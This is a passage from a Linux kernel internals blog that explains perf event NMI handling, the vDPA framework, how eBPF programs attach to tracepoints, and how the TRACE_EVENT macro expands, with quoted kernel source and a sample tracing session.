<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> cpuc->event_list[n] = leader;
</code></pre></div></div>
<h4> perf event del </h4>
<p>x86_pmu_del will delete the event in ‘cpuc->event_list’.</p>
<h4> perf event trigger </h4>
<p>When the hardware event triggered, it will trigger a NMI interrupt. The handler for this is ‘perf_event_nmi_handler’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int
perf_event_nmi_handler(unsigned int cmd, struct pt_regs *regs)
{
u64 start_clock;
u64 finish_clock;
int ret;
/*
* All PMUs/events that share this PMI handler should make sure to
* increment active_events for their events.
*/
if (!atomic_read(&active_events))
return NMI_DONE;
start_clock = sched_clock();
ret = x86_pmu.handle_irq(regs);
finish_clock = sched_clock();
perf_sample_event_took(finish_clock - start_clock);
return ret;
}
</code></pre></div></div>
<p>Taks ‘x86_pmu.handle_irq’=x86_pmu_handle_irq as example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for (idx = 0; idx < x86_pmu.num_counters; idx++) {
if (!test_bit(idx, cpuc->active_mask))
continue;
event = cpuc->events[idx];
val = x86_perf_event_update(event);
if (val & (1ULL << (x86_pmu.cntval_bits - 1)))
continue;
/*
* event overflow
*/
handled++;
perf_sample_data_init(&data, 0, event->hw.last_period);
if (!x86_perf_event_set_period(event))
continue;
if (perf_event_overflow(event, &data, regs))
x86_pmu_stop(event, 0);
}
</code></pre></div></div>
<p>Here we can see it iterates ‘cpuc’ to find which event trigger this interrupt.</p>
vDPA kernel framework introduction2020-08-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/22/vdpa-analysis
<p>Virtual data path acceleration(vDPA) is a new technogy to acclerate the performance (like other hardware offloading). A vDPA device is a device whose datapath compiles with the virtio spec but whose controlpath is vendor-specific.</p>
<p>The vDPA device can be implemented by a device of PF, VF, VDEV, SF. In order to support the vDPA device and hide the complexity of the hardware, vDPA kernel framework has been implemented. Following is the overview architecure which from <a href="https://www.redhat.com/en/blog/vdpa-kernel-framework-part-1-vdpa-bus-abstracting-hardware">vDPA Kernel Framework Part #1: vDPA Bus for Abstracting Hardware</a>.</p>
<p><img src="/assets/img/vdpa/1.png" alt="" /></p>
<p>The vDPA framework is used to abstract the vDPA devices and present them as a virtio device to vhost/virtio subsystem. There are three component in vDPA framework.</p>
<h3> vDPA bus </h3>
<p>The code is in ‘drivers/vdpa/vdpa.c’. The vDPA bus can be used to hold the several types of vdpa bus drivers and vdpa devices.
Some of the export function:</p>
<ul>
<li>
<p>‘__vdpa_alloc_device’: This is called from the vDPA device driver, it allocates vdpa device, the ‘vdpa_config_ops’ parameter is used to specify the vendor-specific operations. These operations include ‘virtqueue ops’, ‘device ops’, ‘dma ops’.</p>
</li>
<li>
<p>‘vdpa_register_device’: register a vDPA device</p>
</li>
<li>
<p>‘__vdpa_register_driver’: register a vDPA bus driver</p>
</li>
</ul>
<p>vDPA bus is registered when the system is startup.</p>
<h3> vDPA device driver </h3>
<p>vDPA device driver is used to communicate directly with the vDPA device through the vendor specific method and present a vDPA abstract device to the vDPA bus. There are currently two vDPA device driver.</p>
<ul>
<li>ifcvf device driver: in drivers/vdpa/ifcvf directory. This is currently the only vDPA hardware device driver in upstream.</li>
<li>vdpa simulator: in drivers/vdpa/vdpa_sim directory. This is just a vDPA simulator device driver.</li>
</ul>
<p>In the dirver’s probe function, it will call ‘vdpa_register_device’ to register a vDPA device.</p>
<h3> vDPA bus driver </h3>
<p>vDPA bus driver is used to connect the vDPA bus to vhost and virtio subsystem. There are two types of vDPA bus drivers.</p>
<ul>
<li>
<p>vhost vdpa bus driver: the code is in ‘drivers/vhost/vdpa.c’. This driver connects the vDPA bus to the vhost subsystem and presents export a vhost char device to userspace. The userspace can then use this vhost dev to bypass the host kernel.</p>
</li>
<li>
<p>virtio vdpa bus driver: the code is in ‘drivers/virtio/virtio_vdpa.c’. This driver abstract the vdpa device to a virtio device. It creates a virtio device in the virtio bus.</p>
</li>
</ul>
<p>Following shows the data structure relations.</p>
<p><img src="/assets/img/vdpa/2.png" alt="" /></p>
How eBPF program connects with tracepoint2020-08-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/09/ebpf-with-tracepoint
<p>In the last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/08/trace-event-framework">Linux tracing - trace event framework</a> I have discussed the internal of trace event. Now it’s time to look at how the trace event connects with eBPF program.</p>
<h3> trace event under perf </h3>
<p>When we define perf subsystem, the ‘TRACE_EVENT’ will be defined as following, also the ‘even</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> include/trace/perf.h
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static notrace void \
perf_trace_##call(void *__data, proto) \
{ \
struct trace_event_call *event_call = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_raw_##call *entry; \
struct pt_regs *__regs; \
u64 __count = 1; \
struct task_struct *__task = NULL; \
struct hlist_head *head; \
int __entry_size; \
int __data_size; \
int rctx; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
head = this_cpu_ptr(event_call->perf_events); \
if (!bpf_prog_array_valid(event_call) && \
__builtin_constant_p(!__task) && !__task && \
hlist_empty(head)) \
return; \
\
__entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
sizeof(u64)); \
__entry_size -= sizeof(u32); \
\
entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx); \
if (!entry) \
return; \
\
perf_fetch_caller_regs(__regs); \
\
tstruct \
\
{ assign; } \
\
perf_trace_run_bpf_submit(entry, __entry_size, rctx, \
event_call, __count, __regs, \
head, __task); \
}
</code></pre></div></div>
<p>As we know this is very like the ‘probe’ function of ‘trace_event_class’s probe function ‘trace_event_raw_event_##call’. In fact, the ‘trace_event_class’ has a ‘perf_probe’ callback and it will be assigned with ‘perf_trace_##call’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> include/trace/trace_events.h
#ifdef CONFIG_PERF_EVENTS
#define _TRACE_PERF_PROTO(call, proto) \
static notrace void \
perf_trace_##call(void *__data, proto);
#define _TRACE_PERF_INIT(call) \
.perf_probe = perf_trace_##call,
static struct trace_event_class __used __refdata event_class_##call = { \
.system = TRACE_SYSTEM_STRING, \
.define_fields = trace_event_define_fields_##call, \
.fields = LIST_HEAD_INIT(event_class_##call.fields),\
.raw_init = trace_event_raw_init, \
.probe = trace_event_raw_event_##call, \
.reg = trace_event_reg, \
_TRACE_PERF_INIT(call) \
};
</code></pre></div></div>
<p>When the userspace calls ‘perf_event_open’ syscall and specify a tracepoint to monitor it will call ‘tp_event->class->reg’ callback with ‘TRACE_REG_PERF_REGISTER’. This callback(trace_event_reg) will call ‘tracepoint_probe_register’ with the ‘call->class->perf_probe’ to add the ‘perf_trace_##call’ to the ‘tracepoint’s funcs member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kernel/trace/trace_event_perf.c:perf_trace_event_reg
tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
kernel/trace/trace_events.c
int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
case TRACE_REG_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->probe,
file);
case TRACE_REG_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->probe,
file);
return 0;
#ifdef CONFIG_PERF_EVENTS
case TRACE_REG_PERF_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->perf_probe,
call);
case TRACE_REG_PERF_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->perf_probe,
call);
return 0;
case TRACE_REG_PERF_OPEN:
case TRACE_REG_PERF_CLOSE:
case TRACE_REG_PERF_ADD:
case TRACE_REG_PERF_DEL:
return 0;
#endif
}
return 0;
}
</code></pre></div></div>
<p>When the ‘trace_xxx_xxx’ is called, the ‘tracepoint’s funcs will be called, so ‘perf_trace_##call’ will be called. In ‘perf_trace_##call’ function, the perf subsys will allocate buffer and call ‘perf_trace_run_bpf_submit’ to commit the buffer. Here will call the ‘trace_call_bpf’ to run the eBPF program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
if (bpf_prog_array_valid(call)) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
</code></pre></div></div>
<h3> Connect eBPF program with tracepoint </h3>
<p>When the userspace calls ‘ioctl(PERF_EVENT_IOC_SET_BPF)’, ‘perf_event_set_bpf_prog’ will be used to handle this request. ‘perf_event_attach_bpf_prog’ then called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_event_attach_bpf_prog(struct perf_event *event,
struct bpf_prog *prog)
{
struct bpf_prog_array __rcu *old_array;
struct bpf_prog_array *new_array;
int ret = -EEXIST;
mutex_lock(&bpf_event_mutex);
if (event->prog)
goto unlock;
old_array = event->tp_event->prog_array;
if (old_array &&
bpf_prog_array_length(old_array) >= BPF_TRACE_MAX_PROGS) {
ret = -E2BIG;
goto unlock;
}
ret = bpf_prog_array_copy(old_array, NULL, prog, &new_array);
if (ret < 0)
goto unlock;
/* set the new array to event->tp_event and set event->prog */
event->prog = prog;
rcu_assign_pointer(event->tp_event->prog_array, new_array);
bpf_prog_array_free(old_array);
unlock:
mutex_unlock(&bpf_event_mutex);
return ret;
}
</code></pre></div></div>
<p>This is quite trivial as it just add the eBPF program to ‘event->tp_event->prog_array’. Here ‘tp_event’ is ‘struct trace_event_call’.</p>
<p>When ‘perf_trace_run_bpf_submit’ calls ‘trace_call_bpf’, this eBPF program will be called. The ‘*(struct pt_regs **)raw_data = regs;’ is quite strange.
This commit <a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce">perf, bpf: allow bpf programs attach to tracepoints</a> explain what this is for. We should also notice if ‘trace_call_bpf’ return non-zero value, the origin ‘perf_tp_event’ will be called and the event data will be copy to the perf subsystem buffer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kernel/events/core.c
void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
if (bpf_prog_array_valid(call)) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
kernel/trace/bpf_trace.c
unsigned int trace_call_bpf(struct trace_event_call *call, void *ctx)
{
unsigned int ret;
if (in_nmi()) /* not supported yet */
return 1;
preempt_disable();
...
ret = BPF_PROG_RUN_ARRAY_CHECK(call->prog_array, ctx, BPF_PROG_RUN);
out:
__this_cpu_dec(bpf_prog_active);
preempt_enable();
return ret;
}
include/linux/bpf.h
#define __BPF_PROG_RUN_ARRAY(array, ctx, func, check_non_null) \
({ \
struct bpf_prog **_prog, *__prog; \
struct bpf_prog_array *_array; \
u32 _ret = 1; \
rcu_read_lock(); \
_array = rcu_dereference(array); \
if (unlikely(check_non_null && !_array))\
goto _out; \
_prog = _array->progs; \
while ((__prog = READ_ONCE(*_prog))) { \
_ret &= func(__prog, ctx); \
_prog++; \
} \
_out: \
rcu_read_unlock(); \
_ret; \
})
#define BPF_PROG_RUN_ARRAY(array, ctx, func) \
__BPF_PROG_RUN_ARRAY(array, ctx, func, false)
#define BPF_PROG_RUN_ARRAY_CHECK(array, ctx, func) \
__BPF_PROG_RUN_ARRAY(array, ctx, func, true)
</code></pre></div></div>
Linux tracing - trace event framework2020-08-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/08/trace-event-framework
<h3> Sample </h3>
<p>This post will show the trace event framework. The most important is the ‘TRACE_EVENT” expand and the connection between tracepoint with ftrace tracer. As usual we will start our discuss with an example. This example is from <a href="https://lwn.net/Articles/383362/">Using the TRACE_EVENT() macro (Part 3)
</a>. There are there files, <a href="/assets/file/trace/sillymod.c">sillymod.c</a>,<a href="/assets/file/trace/silly-trace.h">silly-trace.h</a>,<a href="/assets/file/trace/Makefile">Makefile</a>.</p>
<p>Then we insmod the module and see the trace print out.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/silly# insmod ./sillymod.ko
root@ubuntu:~/silly# cd /sys/kernel/debug/tracing/
root@ubuntu:/sys/kernel/debug/tracing# ls events/silly/
enable filter me_silly
root@ubuntu:/sys/kernel/debug/tracing# echo 1 > events/silly/enable
root@ubuntu:/sys/kernel/debug/tracing# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 6/6 #P:8
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
silly-thread-30460 [001] .... 178964.333898: me_silly: time=4339634000 count=22
silly-thread-30460 [001] .... 178965.358104: me_silly: time=4339634256 count=23
silly-thread-30460 [001] .... 178966.382349: me_silly: time=4339634512 count=24
silly-thread-30460 [001] .... 178967.405770: me_silly: time=4339634768 count=25
silly-thread-30460 [001] .... 178968.430004: me_silly: time=4339635024 count=26
silly-thread-30460 [001] .... 178969.453728: me_silly: time=4339635280 count=27
</code></pre></div></div>
<p>So the most work we do ourself is to write a MACRO ‘TRACE_EVENT’, then we got can use the ‘trace_me_silly’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> TRACE_EVENT(me_silly,
TP_PROTO(unsigned long time, unsigned long count),
TP_ARGS(time, count),
TP_STRUCT__entry(
__field( unsigned long, time )
__field( unsigned long, count )
),
TP_fast_assign(
__entry->time = jiffies;
__entry->count = count;
),
TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
);
</code></pre></div></div>
<p>We will</p>
<h3> MACRO magic</h3>
<p>Before we go to the detail how ‘TRACE_EVENT’ work, let’s go to a small example also from the LWN posts.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DOGS { C(JACK_RUSSELL), C(BULL_TERRIER), C(ITALIAN_GREYHOUND) }
#undef C
#define C(a) ENUM_##a
enum dog_enums DOGS;
#undef C
#define C(a) #a
char *dog_strings[] = DOGS;
char *dog_to_string(enum dog_enums dog)
{
return dog_strings[dog];
} The magic here is the we define the 'C' MACRO two times and change the 'DOGS' MACRO behavior.
</code></pre></div></div>
<p>The first definition of ‘C’ will make ‘DOGS’ as an enum. So we have this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum dog_enums {ENUM_JACK_RUSSELL, ENUM_BULL_TERRIER, ENUM_ITALIAN_GREYHOUND};
</code></pre></div></div>
<p>The second definition of ‘C’ will make ‘DOGS’ as string array:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> char *dog_strings = {"JACK_RUSSELL", "BULL_TERRIER", "ITALIAN_GREYHOUND"};
</code></pre></div></div>
<p>The ‘dog_to_string’ will return a string using the enum as index.</p>
<p>The key idea behind here is that we can define different code using the same information. This is why we can use the ‘trace’ by just define a ‘TRACE_EVENT’ MACRO.</p>
<h3> TRACE_EVENT MACRO</h3>
<p>In the final part of my last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/05/tracing-basic">Linux tracing - kprobe, uprobe and tracepoint</a>. I have disscussed how ‘tracepoint’ is declared and defined.
Now it’s time to see how it how it integrates with ftrace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef TRACE_SYSTEM
#define TRACE_SYSTEM silly
#if !defined(_SILLY_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
#define _SILLY_TRACE_H
#include <linux/tracepoint.h>
TRACE_EVENT(me_silly,
TP_PROTO(unsigned long time, unsigned long count),
TP_ARGS(time, count),
TP_STRUCT__entry(
__field( unsigned long, time )
__field( unsigned long, count )
),
TP_fast_assign(
__entry->time = jiffies;
__entry->count = count;
),
TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
);
#endif /* _SILLY_TRACE_H */
/* This part must be outside protection */
#undef TRACE_INCLUDE_PATH
#define TRACE_INCLUDE_PATH .
#define TRACE_INCLUDE_FILE silly-trace
#include <trace/define_trace.h>
</code></pre></div></div>
<p>First using ‘defined(TRACE_HEADER_MULTI_READ)’ we can include this file several times.</p>
<h4> First definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> linux/tracepoint.h
#define TRACE_EVENT(name, proto, args, struct, assign, print) \
DECLARE_TRACE(name, PARAMS(proto), PARAMS(args))
</code></pre></div></div>
<p>Here ‘DECLARE_TRACE’ declare a tracepoint.</p>
<h4> Second definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/define_trace.h
#undef TRACE_EVENT
#define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
DEFINE_TRACE(name)
</code></pre></div></div>
<p>Here ‘DEFINE_TRACE’ define a tracepoint.</p>
<p>The ‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ has been disscussed in my last post. These two MACRO define a ‘struct tracepoint’ and several function, and all of the ‘tracepoint’ will be stored in the ‘__tracepoints’ section.</p>
<h4> Third definition of 'TRACE_EVENT' </h4>
<p>In trace/define_trace.h we will include trace/trace_events.h header file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/define_trace.h
#include <trace/trace_events.h>
</code></pre></div></div>
<p>At the begining of the header file we will the ‘TRACE_EVENT’ definition as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/trace_events.h
#define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
DECLARE_EVENT_CLASS(name, \
PARAMS(proto), \
PARAMS(args), \
PARAMS(tstruct), \
PARAMS(assign), \
PARAMS(print)); \
DEFINE_EVENT(name, name, PARAMS(proto), PARAMS(args));
</code></pre></div></div>
<p>In this header file, the sub-MACRO ‘DECLARE_EVENT_CLASS’ and ‘DEFINE_EVENT’ will be defined five times. This means ‘TRACE_EVENT’ will be defined five times.</p>
<p>So see the first definition(third in total) in this file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field
#define __field(type, item) type item;
#undef __field_ext
#define __field_ext(type, item, filter_type) type item;
#undef __field_struct
#define __field_struct(type, item) type item;
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type) type item;
#undef __array
#define __array(type, item, len) type item[len];
#undef __dynamic_array
#define __dynamic_array(type, item, len) u32 __data_loc_##item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(char, item, -1)
#undef TP_STRUCT__entry
#define TP_STRUCT__entry(args...) args
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(name, proto, args, tstruct, assign, print) \
struct trace_event_raw_##name { \
struct trace_entry ent; \
tstruct \
char __data[0]; \
}; \
\
static struct trace_event_class event_class_##name;
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, name, proto, args) \
static struct trace_event_call __used \
__attribute__((__aligned__(4))) event_##name
</code></pre></div></div>
<p>‘DECLARE_EVENT_CLASS’ defines a ‘struct trace_event_raw_##name’ and all of the data the tracer want to use is defined in this struct. The data entry can be dynamic, the information of the dynamic data is stored in ‘<em>_data_loc</em>##item’ and the real data is stored in ‘__data[0]’.</p>
<h4> Fourth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field
#define __field(type, item)
#undef __field_ext
#define __field_ext(type, item, filter_type)
#undef __field_struct
#define __field_struct(type, item)
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) u32 item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
struct trace_event_data_offsets_##call { \
tstruct; \
};
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, name, proto, args)
</code></pre></div></div>
<p>This is quite easy as it just define a ‘struct trace_event_data_offsets_##call’, it stores the ‘dynamic data’s offset.</p>
<h4> Fifth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry field
#undef TP_printk
#define TP_printk(fmt, args...) fmt "\n", args
#undef __get_dynamic_array
#define __get_dynamic_array(field) \
((void *)__entry + (__entry->__data_loc_##field & 0xffff))
#undef __get_dynamic_array_len
#define __get_dynamic_array_len(field) \
((__entry->__data_loc_##field >> 16) & 0xffff)
#undef __get_str
#define __get_str(field) ((char *)__get_dynamic_array(field))
#undef __get_bitmask
#define __get_bitmask(field) \
({ \
void *__bitmask = __get_dynamic_array(field); \
unsigned int __bitmask_size; \
__bitmask_size = __get_dynamic_array_len(field); \
trace_print_bitmask_seq(p, __bitmask, __bitmask_size); \
})
#undef __print_flags
#define __print_flags(flag, delim, flag_array...) \
({ \
static const struct trace_print_flags __flags[] = \
{ flag_array, { -1, NULL }}; \
trace_print_flags_seq(p, delim, flag, __flags); \
})
#undef __print_symbolic
#define __print_symbolic(value, symbol_array...) \
({ \
static const struct trace_print_flags symbols[] = \
{ symbol_array, { -1, NULL }}; \
trace_print_symbols_seq(p, value, symbols); \
})
#undef __print_flags_u64
#undef __print_symbolic_u64
#if BITS_PER_LONG == 32
#define __print_flags_u64(flag, delim, flag_array...) \
({ \
static const struct trace_print_flags_u64 __flags[] = \
{ flag_array, { -1, NULL } }; \
trace_print_flags_seq_u64(p, delim, flag, __flags); \
})
#define __print_symbolic_u64(value, symbol_array...) \
({ \
static const struct trace_print_flags_u64 symbols[] = \
{ symbol_array, { -1, NULL } }; \
trace_print_symbols_seq_u64(p, value, symbols); \
})
#else
#define __print_flags_u64(flag, delim, flag_array...) \
__print_flags(flag, delim, flag_array)
#define __print_symbolic_u64(value, symbol_array...) \
__print_symbolic(value, symbol_array)
#endif
#undef __print_hex
#define __print_hex(buf, buf_len) \
trace_print_hex_seq(p, buf, buf_len, false)
#undef __print_hex_str
#define __print_hex_str(buf, buf_len) \
trace_print_hex_seq(p, buf, buf_len, true)
#undef __print_array
#define __print_array(array, count, el_size) \
({ \
BUILD_BUG_ON(el_size != 1 && el_size != 2 && \
el_size != 4 && el_size != 8); \
trace_print_array_seq(p, array, count, el_size); \
})
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static notrace enum print_line_t \
trace_raw_output_##call(struct trace_iterator *iter, int flags, \
struct trace_event *trace_event) \
{ \
struct trace_seq *s = &iter->seq; \
struct trace_seq __maybe_unused *p = &iter->tmp_seq; \
struct trace_event_raw_##call *field; \
int ret; \
\
field = (typeof(field))iter->ent; \
\
ret = trace_raw_output_prep(iter, trace_event); \
if (ret != TRACE_TYPE_HANDLED) \
return ret; \
\
trace_seq_printf(s, print); \
\
return trace_handle_return(s); \
} \
static struct trace_event_functions trace_event_type_funcs_##call = { \
.trace = trace_raw_output_##call, \
};
</code></pre></div></div>
<p>Here define a ‘trace_raw_output_##call’ function this is used to print the raw event data(in ringbuffer) to tracer’s buffer(output buffer). The raw data is stored in ‘iter->ent’. Also there is a ‘struct trace_event_type_funcs_##call’ has been defined. Also here will process the special ‘print’.</p>
<h4> Sixth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field_ext
#define __field_ext(type, item, filter_type) \
ret = trace_define_field(event_call, #type, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
is_signed_type(type), filter_type); \
if (ret) \
return ret;
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type) \
ret = trace_define_field(event_call, #type, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
0, filter_type); \
if (ret) \
return ret;
#undef __field
#define __field(type, item) __field_ext(type, item, FILTER_OTHER)
#undef __field_struct
#define __field_struct(type, item) __field_struct_ext(type, item, FILTER_OTHER)
#undef __array
#define __array(type, item, len) \
do { \
char *type_str = #type"["__stringify(len)"]"; \
BUILD_BUG_ON(len > MAX_FILTER_STR_VAL); \
ret = trace_define_field(event_call, type_str, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
is_signed_type(type), FILTER_OTHER); \
if (ret) \
return ret; \
} while (0);
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
ret = trace_define_field(event_call, "__data_loc " #type "[]", #item, \
offsetof(typeof(field), __data_loc_##item), \
sizeof(field.__data_loc_##item), \
is_signed_type(type), FILTER_OTHER);
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, func, print) \
static int notrace __init \
trace_event_define_fields_##call(struct trace_event_call *event_call) \
{ \
struct trace_event_raw_##call field; \
int ret; \
\
tstruct; \
\
return ret; \
}
</code></pre></div></div>
<p>Here we define function ‘trace_event_define_fields_##call’. In this function, it calls ‘trace_define_field’ for every member in ‘TP_STRUCT__entry’. The ‘trace_define_field’ will insert the field infomation to the linked list ‘event_call->class->fields’ lists. It will be used in the ftrace framework.</p>
<h4> Seventh definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry entry
#undef __field
#define __field(type, item)
#undef __field_ext
#define __field_ext(type, item, filter_type)
#undef __field_struct
#define __field_struct(type, item)
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
__item_length = (len) * sizeof(type); \
__data_offsets->item = __data_size + \
offsetof(typeof(*entry), __data); \
__data_offsets->item |= __item_length << 16; \
__data_size += __item_length;
#undef __string
#define __string(item, src) __dynamic_array(char, item, \
strlen((src) ? (const char *)(src) : "(null)") + 1)
/*
* __bitmask_size_in_bytes_raw is the number of bytes needed to hold
* num_possible_cpus().
*/
#define __bitmask_size_in_bytes_raw(nr_bits) \
(((nr_bits) + 7) / 8)
#define __bitmask_size_in_longs(nr_bits) \
((__bitmask_size_in_bytes_raw(nr_bits) + \
((BITS_PER_LONG / 8) - 1)) / (BITS_PER_LONG / 8))
/*
* __bitmask_size_in_bytes is the number of bytes needed to hold
* num_possible_cpus() padded out to the nearest long. This is what
* is saved in the buffer, just to be consistent.
*/
#define __bitmask_size_in_bytes(nr_bits) \
(__bitmask_size_in_longs(nr_bits) * (BITS_PER_LONG / 8))
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, \
__bitmask_size_in_longs(nr_bits))
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static inline notrace int trace_event_get_offsets_##call( \
struct trace_event_data_offsets_##call *__data_offsets, proto) \
{ \
int __data_size = 0; \
int __maybe_unused __item_length; \
struct trace_event_raw_##call __maybe_unused *entry; \
\
tstruct; \
\
return __data_size; \
}
</code></pre></div></div>
<p>This time define a function ‘trace_event_get_offsets_##call’ this is used to calcute the length and offset in every dynmaic member in ‘TP_STRUCT__entry’. It is stored in ‘struct trace_event_data_offsets_##call’ which is defined in the fourth round expand.</p>
<h4> Eighth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry entry
#undef __field
#define __field(type, item)
#undef __field_struct
#define __field_struct(type, item)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
__entry->__data_loc_##item = __data_offsets.item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __assign_str
#define __assign_str(dst, src) \
strcpy(__get_str(dst), (src) ? (const char *)(src) : "(null)");
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef __get_bitmask
#define __get_bitmask(field) (char *)__get_dynamic_array(field)
#undef __assign_bitmask
#define __assign_bitmask(dst, src, nr_bits) \
memcpy(__get_bitmask(dst), (src), __bitmask_size_in_bytes(nr_bits))
#undef TP_fast_assign
#define TP_fast_assign(args...) args
#undef __perf_count
#define __perf_count(c) (c)
#undef __perf_task
#define __perf_task(t) (t)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
\
static notrace void \
trace_event_raw_event_##call(void *__data, proto) \
{ \
struct trace_event_file *trace_file = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_buffer fbuffer; \
